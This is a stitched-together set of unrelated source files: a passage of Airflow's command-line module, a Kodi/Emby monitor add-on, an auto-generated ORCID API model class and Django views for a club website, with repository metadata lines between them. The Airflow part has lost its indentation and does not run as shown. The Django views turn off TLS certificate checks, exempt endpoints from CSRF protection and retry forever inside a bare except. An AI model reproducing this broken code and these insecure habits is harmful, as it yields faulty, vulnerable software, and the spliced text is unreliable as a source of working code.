'gunicorn', '-w', str(args.workers), '-k', str(args.workerclass),
'-t', '120', '-b', args.hostname + ':' + str(args.port),
'airflow.www.app:cached_app()'])
sp.wait()
def scheduler(args):
print(settings.HEADER)
job = jobs.SchedulerJob(
dag_id=args.dag_id,
subdir=process_subdir(args.subdir),
num_runs=args.num_runs,
do_pickle=args.do_pickle)
job.run()
def serve_logs(args):
print("Starting flask")
import flask
flask_app = flask.Flask(__name__)
@flask_app.route('/log/<path:filename>')
def serve_logs(filename): # noqa
log = os.path.expanduser(conf.get('core', 'BASE_LOG_FOLDER'))
return flask.send_from_directory(
log,
filename,
mimetype="application/json",
as_attachment=False)
WORKER_LOG_SERVER_PORT = \
int(conf.get('celery', 'WORKER_LOG_SERVER_PORT'))
flask_app.run(
host='0.0.0.0', port=WORKER_LOG_SERVER_PORT)
def worker(args):
# Worker to serve static log files through this simple flask app
env = os.environ.copy()
env['AIRFLOW_HOME'] = settings.AIRFLOW_HOME
sp = subprocess.Popen(['airflow', 'serve_logs'], env=env)
# Celery worker
from airflow.executors.celery_executor import app as celery_app
from celery.bin import worker
worker = worker.worker(app=celery_app)
options = {
'optimization': 'fair',
'O': 'fair',
'queues': args.queues,
'concurrency': args.concurrency,
}
worker.run(**options)
sp.kill()
def initdb(args): # noqa
print("DB: " + repr(settings.engine.url))
utils.initdb()
print("Done.")
def resetdb(args):
print("DB: " + repr(settings.engine.url))
if args.yes or input(
"This will drop existing tables if they exist. "
"Proceed? (y/n)").upper() == "Y":
logging.basicConfig(level=settings.LOGGING_LEVEL,
format=settings.SIMPLE_LOG_FORMAT)
utils.resetdb()
else:
print("Bail.")
def upgradedb(args): # noqa
print("DB: " + repr(settings.engine.url))
utils.upgradedb()
def version(args): # noqa
print(settings.HEADER + " v" + airflow.__version__)
def flower(args):
broka = conf.get('celery', 'BROKER_URL')
args.port = args.port or conf.get('celery', 'FLOWER_PORT')
    port = '--port=' + str(args.port)
api = ''
if args.broker_api:
api = '--broker_api=' + args.broker_api
sp = subprocess.Popen(['flower', '-b', broka, port, api])
sp.wait()
def kerberos(args): # noqa
print(settings.HEADER)
import airflow.security.kerberos
airflow.security.kerberos.run()
Arg = namedtuple(
'Arg', ['flags', 'help', 'action', 'default', 'nargs', 'type', 'choices'])
Arg.__new__.__defaults__ = (None, None, None, None, None, None, None)
class CLIFactory(object):
args = {
# Shared
'dag_id': Arg(("dag_id",), "The id of the dag"),
'task_id': Arg(("task_id",), "The id of the task"),
'execution_date': Arg(
("execution_date",), help="The execution date of the DAG",
type=parsedate),
'task_regex': Arg(
("-t", "--task_regex"),
"The regex to filter specific task_ids to backfill (optional)"),
'subdir': Arg(
("-sd", "--subdir"),
"File location or directory from which to look for the dag",
default=DAGS_FOLDER),
'start_date': Arg(
("-s", "--start_date"), "Override start_date YYYY-MM-DD",
type=parsedate),
'end_date': Arg(
("-e", "--end_date"), "Override end_date YYYY-MM-DD",
type=parsedate),
'dry_run': Arg(
("-dr", "--dry_run"), "Perform a dry run", "store_true"),
# backfill
'mark_success': Arg(
("-m", "--mark_success"),
"Mark jobs as succeeded without running them", "store_true"),
'local': Arg(
("-l", "--local"),
"Run the task using the LocalExecutor", "store_true"),
'donot_pickle': Arg(
("-x", "--donot_pickle"), (
"Do not attempt to pickle the DAG object to send over "
"to the workers, just tell the workers to run their version "
"of the code."),
"store_true"),
'include_adhoc': Arg(
("-a", "--include_adhoc"),
"Include dags with the adhoc parameter.", "store_true"),
'bf_ignore_dependencies': Arg(
("-i", "--ignore_dependencies"),
(
"Skip upstream tasks, run only the tasks "
"matching the regexp. Only works in conjunction "
"with task_regex"),
"store_true"),
'pool': Arg(("--pool",), "Resource pool to use"),
# list_dags
'tree': Arg(("-t", "--tree"), "Tree view", "store_true"),
# clear
'upstream': Arg(
("-u", "--upstream"), "Include upstream tasks", "store_true"),
'only_failed': Arg(
("-f", "--only_failed"), "Only failed jobs", "store_true"),
'only_running': Arg(
("-r", "--only_running"), "Only running jobs", "store_true"),
'downstream': Arg(
("-d", "--downstream"), "Include downstream tasks", "store_true"),
'no_confirm': Arg(
("-c", "--no_confirm"),
"Do not request confirmation", "store_true"),
# trigger_dag
        'run_id': Arg(("-r", "--run_id"), "Helps to identify this run"),
'conf': Arg(
('-c', '--conf'),
"json string that gets pickled into the DagRun's conf attribute"),
# kerberos
'principal': Arg(
("principal",), "kerberos principal",
nargs='?', default=conf.get('kerberos', 'principal')),
'keytab': Arg(
("-kt", "--keytab"), "keytab",
nargs='?', default=conf.get('kerberos', 'keytab')),
# run
'task_start_date': Arg(
("-s", "--task_start_date"),
"Override the tasks's start_date (used internally)",
type=parsedate),
'force': Arg(
("-f", "--force"),
"Force a run regardless or previous success", "store_true"),
'raw': Arg(("-r", "--raw"), argparse.SUPPRESS, "store_true"),
'ignore_dependencies': Arg(
("-i", "--ignore_dependencies"),
"Ignore upstream and depends_on_past dependencies", "store_true"),
'ship_dag': Arg(
("--ship_dag",),
"Pickles (serializes) the DAG and ships it to the worker",
"store_true"),
'pickle': Arg(
("-p", "--pickle"),
"Serialized pickle object of the entire dag (used internally)"),
'job_id': Arg(("-j", "--job_id"), argparse.SUPPRESS),
# webserver
'port': Arg(
("-p", "--port"),
default=conf.get('webserver', 'WEB_SERVER_PORT'),
type=int,
help="The port on which to run the server"),
'workers': Arg(
("-w", "--workers"),
default=conf.get('webserver', 'WORKERS'),
type=int,
help="Number of workers to run the webserver on"),
'workerclass': Arg(
("-k", "--workerclass"),
default=conf.get('webserver', 'WORKER_CLASS'),
choices=['sync', 'eventlet', 'gevent', 'tornado'],
help="The worker class to use for gunicorn"),
'hostname': Arg(
("-hn", "--hostname"),
default=conf.get('webserver', 'WEB_SERVER_HOST'),
help="Set the hostname on which to run the web server"),
'debug': Arg(
("-d", "--debug"),
"Use the server that ships with Flask in debug mode",
"store_true"),
# resetdb
'yes': Arg(
("-y", "--yes"),
"Do not prompt to confirm reset. Use with care!",
"store_true",
default=False),
# scheduler
'dag_id_opt': Arg(("-d", "--dag_id"), help="The id of the dag to run"),
'num_runs': Arg(
("-n", "--num_runs"),
default=None, type=int,
help="Set the number of runs to execute before exiting"),
# worker
'do_pickle': Arg(
("-p", "--do_pickle"),
default=False,
help=(
"Attempt to pickle the DAG object to send over "
"to the workers, instead of letting workers run their version "
"of the code."),
action="store_true"),
'queues': Arg(
("-q", "--queues"),
help="Comma delimited list of queues to serve",
default=conf.get('celery', 'DEFAULT_QUEUE')),
'concurrency': Arg(
("-c", "--concurrency"),
type=int,
help="The number of worker processes",
default=conf.get('celery', 'celeryd_concurrency')),
# flower
'broker_api': Arg(("-a", "--broker_api"), help="Broker api"),
'flower_port': Arg(
("-p", "--port"),
default=conf.get('webserver', 'WEB_SERVER_PORT'),
type=int,
help="The port on which to run the server"),
'task_params': Arg(
("-tp", "--task_params"),
help="Sends a JSON params dict to the task"),
}
subparsers = (
{
'func': backfill,
'help': "Run subsections of a DAG for a specified date range",
'args': (
'dag_id', 'task_regex', 'start_date', 'end_date',
'mark_success', 'local', 'donot_pickle', 'include_adhoc',
'bf_ignore_dependencies', 'subdir', 'pool', 'dry_run')
}, {
'func': list_tasks,
'help': "List the tasks within a DAG",
'args': ('dag_id', 'tree', 'subdir'),
}, {
'func': clear,
'help': "Clear a set of task instance, as if they never ran",
'args': (
'dag_id', 'task_regex', 'start_date', 'end_date', 'subdir',
'upstream', 'downstream', 'no_confirm'),
}, {
'func': pause,
'help': "Pause a DAG",
'args': ('dag_id', 'subdir'),
}, {
'func': unpause,
'help': "Pause a DAG",
'args': ('dag_id', 'subdir'),
}, {
'func': trigger_dag,
'help': "Trigger a DAG run",
'args': ('dag_id', 'subdir', 'run_id', 'conf'),
}, {
'func': kerberos,
'help': "Start a kerberos ticket renewer",
'args': ('dag_id', 'principal', 'keytab'),
}, {
'func': render,
'help': "Render a task instance's template(s)",
'args': ('dag_id', 'task_id', 'execution_date', 'subdir'),
}, {
'func': run,
'help': "Run a single task instance",
'args': (
'dag_id', 'task_id', 'execution_date', 'subdir',
'mark_success', 'force', 'pool',
'task_start_date', 'local', 'raw', 'ignore_dependencies',
'ship_dag', 'pickle', 'job_id'),
}, {
'func': initdb,
'help': "Initialize the metadata database",
'args': tuple(),
}, {
'func': list_dags,
'help': "List all the DAGs",
'args': ('subdir',),
}, {
'func': task_state,
'help': "Get the status of a task instance",
'args': ('dag_id', 'task_id', 'execution_date', 'subdir'),
}, {
'func': serve_logs,
'help': "Serve logs generate by worker",
'args': tuple(),
}, {
'func': test,
'help': (
"Test a task instance. This will run a task without checking for "
"dependencies or recording it's state in the database."),
'args': (
'dag_id', 'task_id', 'execution_date', 'subdir', 'dry_run',
'task_params'),
}, {
'func': webserver,
'help': "Start a Airflow webserver instance",
'args': ('port', 'workers', 'workerclass', 'hostname', 'debug'),
}, {
'func': resetdb,
'help': "Burn down and rebuild the metadata database",
'args': ('yes',),
}, {
'func': upgradedb,
'help': "Upgrade metadata database to latest version",
'args': tuple(),
}, {
'func': scheduler,
'help': "Start a scheduler scheduler instance",
'args': ('dag_id_opt', 'subdir', 'num_runs', 'do_pickle'),
}, {
'func': worker,
'help': "Start a Celery worker node",
'args': ('do_pickle', 'queues', 'concurrency'),
}, {
'func': flower,
'help': "Start a Celery Flower",
'args': ('flower_port', 'broker_api'),
}, {
'func': version,
'help': "Show the version",
'args': tuple(),
},
)
subparsers_dict = {sp['func'].__name__: sp for sp in subparsers}
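    # Subcommands that are also exposed on the per-DAG parser built by get_parser(dag_parser=True).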
dag_subparsers = (
'list_tasks', 'backfill', 'test', 'run', 'pause', 'unpause')
@classmethod
def get_parser(cls, dag_parser=False):
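        # Build an argparse parser from the specs above; with dag_parser=True only the
        # per-DAG subcommands are registered and their dag_id arguments are skipped.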
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers(
help='sub-command help', dest='subcommand')
subparsers.required = True
subparser_list = cls.dag_subparsers if dag_parser else cls.subparsers_dict.keys()
for sub in subparser_list:
sub = cls.subparsers_dict[sub]
sp = subparsers.add_parser(sub['func'].__name__, help=sub['help'])
for arg in sub['args']:
if 'dag_id' in arg and dag_parser:
continue
arg = cls.args[arg]
kwargs = {
f: getattr(arg, f)
for f in arg._fields if f != 'flags' and getattr(arg, f)}
sp.add_argument(*arg.flags, **kwargs)
sp.set_defaults(func=sub['func'])
return parser
| apache-2.0 | 8,212,946,903,933,336,000 | 33.20191 | 89 | 0.533546 | false |
sloshedpuppie/LetsGoRetro | addons/plugin.video.emby-master/resources/lib/kodimonitor.py | 1 | 9120 | # -*- coding: utf-8 -*-
#################################################################################################
import json
import xbmc
import xbmcgui
import clientinfo
import downloadutils
import embydb_functions as embydb
import playbackutils as pbutils
import utils
#################################################################################################
class KodiMonitor(xbmc.Monitor):
def __init__(self):
self.clientInfo = clientinfo.ClientInfo()
self.addonName = self.clientInfo.getAddonName()
self.doUtils = downloadutils.DownloadUtils()
self.logMsg("Kodi monitor started.", 1)
def logMsg(self, msg, lvl=1):
self.className = self.__class__.__name__
utils.logMsg("%s %s" % (self.addonName, self.className), msg, lvl)
def onScanStarted(self, library):
self.logMsg("Kodi library scan %s running." % library, 2)
if library == "video":
utils.window('emby_kodiScan', value="true")
def onScanFinished(self, library):
self.logMsg("Kodi library scan %s finished." % library, 2)
if library == "video":
utils.window('emby_kodiScan', clear=True)
def onSettingsChanged(self):
# Monitor emby settings
# Review reset setting at a later time, need to be adjusted to account for initial setup
# changes.
'''currentPath = utils.settings('useDirectPaths')
if utils.window('emby_pluginpath') != currentPath:
# Plugin path value changed. Offer to reset
self.logMsg("Changed to playback mode detected", 1)
utils.window('emby_pluginpath', value=currentPath)
resp = xbmcgui.Dialog().yesno(
heading="Playback mode change detected",
line1=(
"Detected the playback mode has changed. The database "
"needs to be recreated for the change to be applied. "
"Proceed?"))
if resp:
utils.reset()'''
currentLog = utils.settings('logLevel')
if utils.window('emby_logLevel') != currentLog:
# The log level changed, set new prop
self.logMsg("New log level: %s" % currentLog, 1)
utils.window('emby_logLevel', value=currentLog)
def onNotification(self, sender, method, data):
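        # Dispatch on Kodi JSON-RPC notifications: playback start, manual watched-state
        # changes, library removals, system wake and playlist events.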
doUtils = self.doUtils
        if method not in ("Playlist.OnAdd",):
self.logMsg("Method: %s Data: %s" % (method, data), 1)
if data:
data = json.loads(data,'utf-8')
if method == "Player.OnPlay":
# Set up report progress for emby playback
item = data.get('item')
try:
kodiid = item['id']
item_type = item['type']
except (KeyError, TypeError):
self.logMsg("Item is invalid for playstate update.", 1)
else:
if ((utils.settings('useDirectPaths') == "1" and not item_type == "song") or
(item_type == "song" and utils.settings('enableMusic') == "true")):
# Set up properties for player
embyconn = utils.kodiSQL('emby')
embycursor = embyconn.cursor()
emby_db = embydb.Embydb_Functions(embycursor)
emby_dbitem = emby_db.getItem_byKodiId(kodiid, item_type)
try:
itemid = emby_dbitem[0]
except TypeError:
self.logMsg("No kodiid returned.", 1)
else:
url = "{server}/emby/Users/{UserId}/Items/%s?format=json" % itemid
result = doUtils.downloadUrl(url)
self.logMsg("Item: %s" % result, 2)
playurl = None
count = 0
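                        # getPlayingFile() raises RuntimeError until playback has actually
                        # started, so retry briefly before giving up.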
while not playurl and count < 2:
try:
playurl = xbmc.Player().getPlayingFile()
except RuntimeError:
count += 1
xbmc.sleep(200)
else:
listItem = xbmcgui.ListItem()
playback = pbutils.PlaybackUtils(result)
if item_type == "song" and utils.settings('streamMusic') == "true":
utils.window('emby_%s.playmethod' % playurl,
value="DirectStream")
else:
utils.window('emby_%s.playmethod' % playurl,
value="DirectPlay")
# Set properties for player.py
playback.setProperties(playurl, listItem)
finally:
embycursor.close()
elif method == "VideoLibrary.OnUpdate":
# Manually marking as watched/unwatched
playcount = data.get('playcount')
item = data.get('item')
try:
kodiid = item['id']
item_type = item['type']
except (KeyError, TypeError):
self.logMsg("Item is invalid for playstate update.", 1)
else:
# Send notification to the server.
embyconn = utils.kodiSQL('emby')
embycursor = embyconn.cursor()
emby_db = embydb.Embydb_Functions(embycursor)
emby_dbitem = emby_db.getItem_byKodiId(kodiid, item_type)
try:
itemid = emby_dbitem[0]
except TypeError:
self.logMsg("Could not find itemid in emby database.", 1)
else:
                    # Skip the server update when the watched-state change came from actual playback.
if utils.window('emby_skipWatched%s' % itemid) == "true":
# property is set in player.py
utils.window('emby_skipWatched%s' % itemid, clear=True)
else:
# notify the server
url = "{server}/emby/Users/{UserId}/PlayedItems/%s?format=json" % itemid
if playcount != 0:
doUtils.downloadUrl(url, action_type="POST")
self.logMsg("Mark as watched for itemid: %s" % itemid, 1)
else:
doUtils.downloadUrl(url, action_type="DELETE")
self.logMsg("Mark as unwatched for itemid: %s" % itemid, 1)
finally:
embycursor.close()
elif method == "VideoLibrary.OnRemove":
# Removed function, because with plugin paths + clean library, it will wipe
# entire library if user has permissions. Instead, use the emby context menu available
# in Isengard and higher version
pass
'''try:
kodiid = data['id']
type = data['type']
except (KeyError, TypeError):
self.logMsg("Item is invalid for emby deletion.", 1)
else:
# Send the delete action to the server.
embyconn = utils.kodiSQL('emby')
embycursor = embyconn.cursor()
emby_db = embydb.Embydb_Functions(embycursor)
emby_dbitem = emby_db.getItem_byKodiId(kodiid, type)
try:
itemid = emby_dbitem[0]
except TypeError:
self.logMsg("Could not find itemid in emby database.", 1)
else:
if utils.settings('skipContextMenu') != "true":
resp = xbmcgui.Dialog().yesno(
heading="Confirm delete",
line1="Delete file on Emby Server?")
if not resp:
self.logMsg("User skipped deletion.", 1)
embycursor.close()
return
url = "{server}/emby/Items/%s?format=json" % itemid
self.logMsg("Deleting request: %s" % itemid)
doUtils.downloadUrl(url, action_type="DELETE")
finally:
embycursor.close()'''
elif method == "System.OnWake":
# Allow network to wake up
xbmc.sleep(10000)
utils.window('emby_onWake', value="true")
elif method == "Playlist.OnClear":
pass | gpl-2.0 | 3,806,743,188,749,237,000 | 41.645933 | 99 | 0.460417 | false |
Royal-Society-of-New-Zealand/NZ-ORCID-Hub | orcid_api_v3/models/work_summary_v30_rc1.py | 1 | 13920 | # coding: utf-8
"""
ORCID Member
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: Latest
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from orcid_api_v3.models.created_date_v30_rc1 import CreatedDateV30Rc1 # noqa: F401,E501
from orcid_api_v3.models.external_i_ds_v30_rc1 import ExternalIDsV30Rc1 # noqa: F401,E501
from orcid_api_v3.models.last_modified_date_v30_rc1 import LastModifiedDateV30Rc1 # noqa: F401,E501
from orcid_api_v3.models.publication_date_v30_rc1 import PublicationDateV30Rc1 # noqa: F401,E501
from orcid_api_v3.models.source_v30_rc1 import SourceV30Rc1 # noqa: F401,E501
from orcid_api_v3.models.title_v30_rc1 import TitleV30Rc1 # noqa: F401,E501
from orcid_api_v3.models.url_v30_rc1 import UrlV30Rc1 # noqa: F401,E501
from orcid_api_v3.models.work_title_v30_rc1 import WorkTitleV30Rc1 # noqa: F401,E501
class WorkSummaryV30Rc1(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'put_code': 'int',
'created_date': 'CreatedDateV30Rc1',
'last_modified_date': 'LastModifiedDateV30Rc1',
'source': 'SourceV30Rc1',
'title': 'WorkTitleV30Rc1',
'external_ids': 'ExternalIDsV30Rc1',
'url': 'UrlV30Rc1',
'type': 'str',
'publication_date': 'PublicationDateV30Rc1',
'journal_title': 'TitleV30Rc1',
'visibility': 'str',
'path': 'str',
'display_index': 'str'
}
attribute_map = {
'put_code': 'put-code',
'created_date': 'created-date',
'last_modified_date': 'last-modified-date',
'source': 'source',
'title': 'title',
'external_ids': 'external-ids',
'url': 'url',
'type': 'type',
'publication_date': 'publication-date',
'journal_title': 'journal-title',
'visibility': 'visibility',
'path': 'path',
'display_index': 'display-index'
}
def __init__(self, put_code=None, created_date=None, last_modified_date=None, source=None, title=None, external_ids=None, url=None, type=None, publication_date=None, journal_title=None, visibility=None, path=None, display_index=None): # noqa: E501
"""WorkSummaryV30Rc1 - a model defined in Swagger""" # noqa: E501
self._put_code = None
self._created_date = None
self._last_modified_date = None
self._source = None
self._title = None
self._external_ids = None
self._url = None
self._type = None
self._publication_date = None
self._journal_title = None
self._visibility = None
self._path = None
self._display_index = None
self.discriminator = None
if put_code is not None:
self.put_code = put_code
if created_date is not None:
self.created_date = created_date
if last_modified_date is not None:
self.last_modified_date = last_modified_date
if source is not None:
self.source = source
if title is not None:
self.title = title
if external_ids is not None:
self.external_ids = external_ids
if url is not None:
self.url = url
if type is not None:
self.type = type
if publication_date is not None:
self.publication_date = publication_date
if journal_title is not None:
self.journal_title = journal_title
if visibility is not None:
self.visibility = visibility
if path is not None:
self.path = path
if display_index is not None:
self.display_index = display_index
@property
def put_code(self):
"""Gets the put_code of this WorkSummaryV30Rc1. # noqa: E501
:return: The put_code of this WorkSummaryV30Rc1. # noqa: E501
:rtype: int
"""
return self._put_code
@put_code.setter
def put_code(self, put_code):
"""Sets the put_code of this WorkSummaryV30Rc1.
:param put_code: The put_code of this WorkSummaryV30Rc1. # noqa: E501
:type: int
"""
self._put_code = put_code
@property
def created_date(self):
"""Gets the created_date of this WorkSummaryV30Rc1. # noqa: E501
:return: The created_date of this WorkSummaryV30Rc1. # noqa: E501
:rtype: CreatedDateV30Rc1
"""
return self._created_date
@created_date.setter
def created_date(self, created_date):
"""Sets the created_date of this WorkSummaryV30Rc1.
:param created_date: The created_date of this WorkSummaryV30Rc1. # noqa: E501
:type: CreatedDateV30Rc1
"""
self._created_date = created_date
@property
def last_modified_date(self):
"""Gets the last_modified_date of this WorkSummaryV30Rc1. # noqa: E501
:return: The last_modified_date of this WorkSummaryV30Rc1. # noqa: E501
:rtype: LastModifiedDateV30Rc1
"""
return self._last_modified_date
@last_modified_date.setter
def last_modified_date(self, last_modified_date):
"""Sets the last_modified_date of this WorkSummaryV30Rc1.
:param last_modified_date: The last_modified_date of this WorkSummaryV30Rc1. # noqa: E501
:type: LastModifiedDateV30Rc1
"""
self._last_modified_date = last_modified_date
@property
def source(self):
"""Gets the source of this WorkSummaryV30Rc1. # noqa: E501
:return: The source of this WorkSummaryV30Rc1. # noqa: E501
:rtype: SourceV30Rc1
"""
return self._source
@source.setter
def source(self, source):
"""Sets the source of this WorkSummaryV30Rc1.
:param source: The source of this WorkSummaryV30Rc1. # noqa: E501
:type: SourceV30Rc1
"""
self._source = source
@property
def title(self):
"""Gets the title of this WorkSummaryV30Rc1. # noqa: E501
:return: The title of this WorkSummaryV30Rc1. # noqa: E501
:rtype: WorkTitleV30Rc1
"""
return self._title
@title.setter
def title(self, title):
"""Sets the title of this WorkSummaryV30Rc1.
:param title: The title of this WorkSummaryV30Rc1. # noqa: E501
:type: WorkTitleV30Rc1
"""
self._title = title
@property
def external_ids(self):
"""Gets the external_ids of this WorkSummaryV30Rc1. # noqa: E501
:return: The external_ids of this WorkSummaryV30Rc1. # noqa: E501
:rtype: ExternalIDsV30Rc1
"""
return self._external_ids
@external_ids.setter
def external_ids(self, external_ids):
"""Sets the external_ids of this WorkSummaryV30Rc1.
:param external_ids: The external_ids of this WorkSummaryV30Rc1. # noqa: E501
:type: ExternalIDsV30Rc1
"""
self._external_ids = external_ids
@property
def url(self):
"""Gets the url of this WorkSummaryV30Rc1. # noqa: E501
:return: The url of this WorkSummaryV30Rc1. # noqa: E501
:rtype: UrlV30Rc1
"""
return self._url
@url.setter
def url(self, url):
"""Sets the url of this WorkSummaryV30Rc1.
:param url: The url of this WorkSummaryV30Rc1. # noqa: E501
:type: UrlV30Rc1
"""
self._url = url
@property
def type(self):
"""Gets the type of this WorkSummaryV30Rc1. # noqa: E501
:return: The type of this WorkSummaryV30Rc1. # noqa: E501
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this WorkSummaryV30Rc1.
:param type: The type of this WorkSummaryV30Rc1. # noqa: E501
:type: str
"""
allowed_values = ["ARTISTIC_PERFORMANCE", "BOOK_CHAPTER", "BOOK_REVIEW", "BOOK", "CONFERENCE_ABSTRACT", "CONFERENCE_PAPER", "CONFERENCE_POSTER", "DATA_SET", "DICTIONARY_ENTRY", "DISCLOSURE", "DISSERTATION", "EDITED_BOOK", "ENCYCLOPEDIA_ENTRY", "INVENTION", "JOURNAL_ARTICLE", "JOURNAL_ISSUE", "LECTURE_SPEECH", "LICENSE", "MAGAZINE_ARTICLE", "MANUAL", "NEWSLETTER_ARTICLE", "NEWSPAPER_ARTICLE", "ONLINE_RESOURCE", "OTHER", "PATENT", "PREPRINT", "REGISTERED_COPYRIGHT", "REPORT", "RESEARCH_TECHNIQUE", "RESEARCH_TOOL", "SOFTWARE", "SPIN_OFF_COMPANY", "STANDARDS_AND_POLICY", "SUPERVISED_STUDENT_PUBLICATION", "TECHNICAL_STANDARD", "TEST", "TRADEMARK", "TRANSLATION", "WEBSITE", "WORKING_PAPER", "UNDEFINED"] # noqa: E501
if type not in allowed_values:
raise ValueError(
"Invalid value for `type` ({0}), must be one of {1}" # noqa: E501
.format(type, allowed_values)
)
self._type = type
@property
def publication_date(self):
"""Gets the publication_date of this WorkSummaryV30Rc1. # noqa: E501
:return: The publication_date of this WorkSummaryV30Rc1. # noqa: E501
:rtype: PublicationDateV30Rc1
"""
return self._publication_date
@publication_date.setter
def publication_date(self, publication_date):
"""Sets the publication_date of this WorkSummaryV30Rc1.
:param publication_date: The publication_date of this WorkSummaryV30Rc1. # noqa: E501
:type: PublicationDateV30Rc1
"""
self._publication_date = publication_date
@property
def journal_title(self):
"""Gets the journal_title of this WorkSummaryV30Rc1. # noqa: E501
:return: The journal_title of this WorkSummaryV30Rc1. # noqa: E501
:rtype: TitleV30Rc1
"""
return self._journal_title
@journal_title.setter
def journal_title(self, journal_title):
"""Sets the journal_title of this WorkSummaryV30Rc1.
:param journal_title: The journal_title of this WorkSummaryV30Rc1. # noqa: E501
:type: TitleV30Rc1
"""
self._journal_title = journal_title
@property
def visibility(self):
"""Gets the visibility of this WorkSummaryV30Rc1. # noqa: E501
:return: The visibility of this WorkSummaryV30Rc1. # noqa: E501
:rtype: str
"""
return self._visibility
@visibility.setter
def visibility(self, visibility):
"""Sets the visibility of this WorkSummaryV30Rc1.
:param visibility: The visibility of this WorkSummaryV30Rc1. # noqa: E501
:type: str
"""
allowed_values = ["LIMITED", "REGISTERED_ONLY", "PUBLIC", "PRIVATE"] # noqa: E501
if visibility not in allowed_values:
raise ValueError(
"Invalid value for `visibility` ({0}), must be one of {1}" # noqa: E501
.format(visibility, allowed_values)
)
self._visibility = visibility
@property
def path(self):
"""Gets the path of this WorkSummaryV30Rc1. # noqa: E501
:return: The path of this WorkSummaryV30Rc1. # noqa: E501
:rtype: str
"""
return self._path
@path.setter
def path(self, path):
"""Sets the path of this WorkSummaryV30Rc1.
:param path: The path of this WorkSummaryV30Rc1. # noqa: E501
:type: str
"""
self._path = path
@property
def display_index(self):
"""Gets the display_index of this WorkSummaryV30Rc1. # noqa: E501
:return: The display_index of this WorkSummaryV30Rc1. # noqa: E501
:rtype: str
"""
return self._display_index
@display_index.setter
def display_index(self, display_index):
"""Sets the display_index of this WorkSummaryV30Rc1.
:param display_index: The display_index of this WorkSummaryV30Rc1. # noqa: E501
:type: str
"""
self._display_index = display_index
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(WorkSummaryV30Rc1, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, WorkSummaryV30Rc1):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| mit | 3,248,907,714,498,165,000 | 30.422122 | 728 | 0.599282 | false |
pclubuiet/website | home/views.py | 1 | 3396 | from django import views
from django.shortcuts import render, get_object_or_404
from django.views.generic import TemplateView
from django.views.generic.edit import CreateView
from .models import *
from .forms import *
import requests
import http
from django.urls import reverse_lazy
from django.views.decorators.csrf import csrf_exempt
from django.http import JsonResponse
class Template404(TemplateView):
template_name = "404.html"
class Home(TemplateView):
template_name = 'home/home.html'
class Topics(views.View):
def get(self, request, *args, **kwargs):
return render(request, "home/resources/topics.html", {'topics': Topic.objects.all()})
class Resources(views.View):
def get(self, request, pk, *args, **kwargs):
topic = get_object_or_404(Topic, pk=pk)
return render(request, "home/resources/resources.html", {'resources': topic.resource_set.all(), 'topic' : topic})
class BlogPostList(views.View):
def get(self, request, *args, **kwargs):
posts = BlogPost.objects.all()
return render(request, "home/blog/index.html", {'posts': posts})
class BlogPostView(views.View):
def get(self, request, pk, *args, **kwargs):
post = get_object_or_404(BlogPost, pk=pk)
return render(request, "home/blog/blog_post.html", {'post': post})
class Leaderboard(views.View):
def get(self, request, *args, **kwargs):
users = Users.objects.all()
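        # Refresh each user's PR count (PRs created between 30 Sep and 31 Oct 2018)
        # from the GitHub search API before rendering the leaderboard.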
for user in users:
connected = False
while not connected:
try:
user_name = user.github_handle
response = requests.get('https://api.github.com/search/issues?sort=created&q=author:{}&type:pr&per_page=100'.format(user_name), verify = False).json()
pr_count = 0
print(response)
for obj in response['items']:
                        if 'pull_request' in obj:
                            if '2018-09-30T00:00:00Z' < obj['created_at'] < '2018-10-31T23:59:59Z':
                                pr_count += 1
user.pr_count = pr_count
user.save()
connected = True
                except Exception:
                    # The request failed (e.g. network error or rate limit); keep retrying.
                    pass
return render(request, 'home/leaderboard.html', {'users': users})
class RegisterUser(CreateView):
form_class = RegisterUserForm
template_name = "home/registeruser.html"
success_url = reverse_lazy('home:home')
@csrf_exempt
def GithubEmailCheck(request):
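    # JSON endpoint: report whether the submitted GitHub handle or email is already registered.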
github_handle = request.POST.get('github_handle')
email = request.POST.get('email')
print("Received ", github_handle)
users = Users.objects.all()
for user in users:
if user.github_handle == github_handle:
return JsonResponse({'message' : 'Duplicate Github Handle'})
if user.email == email:
return JsonResponse({'message' : 'Duplicate Email'})
return JsonResponse({'message' : 'New'})
@csrf_exempt
def GithubCheck(request):
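    # JSON endpoint: report whether the given GitHub handle exists on GitHub.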
github_handle = request.POST.get('github_handle')
response = requests.get("https://api.github.com/users/{}".format(github_handle), verify = False).json()
print("https://api.github.com/users/{}".format(github_handle))
if ('login' in response):
print("Found")
return JsonResponse({'message' : 'Found'})
else:
return JsonResponse({'message' : 'Not Found'}) | gpl-3.0 | -1,718,221,211,592,258,300 | 38.045977 | 170 | 0.620436 | false |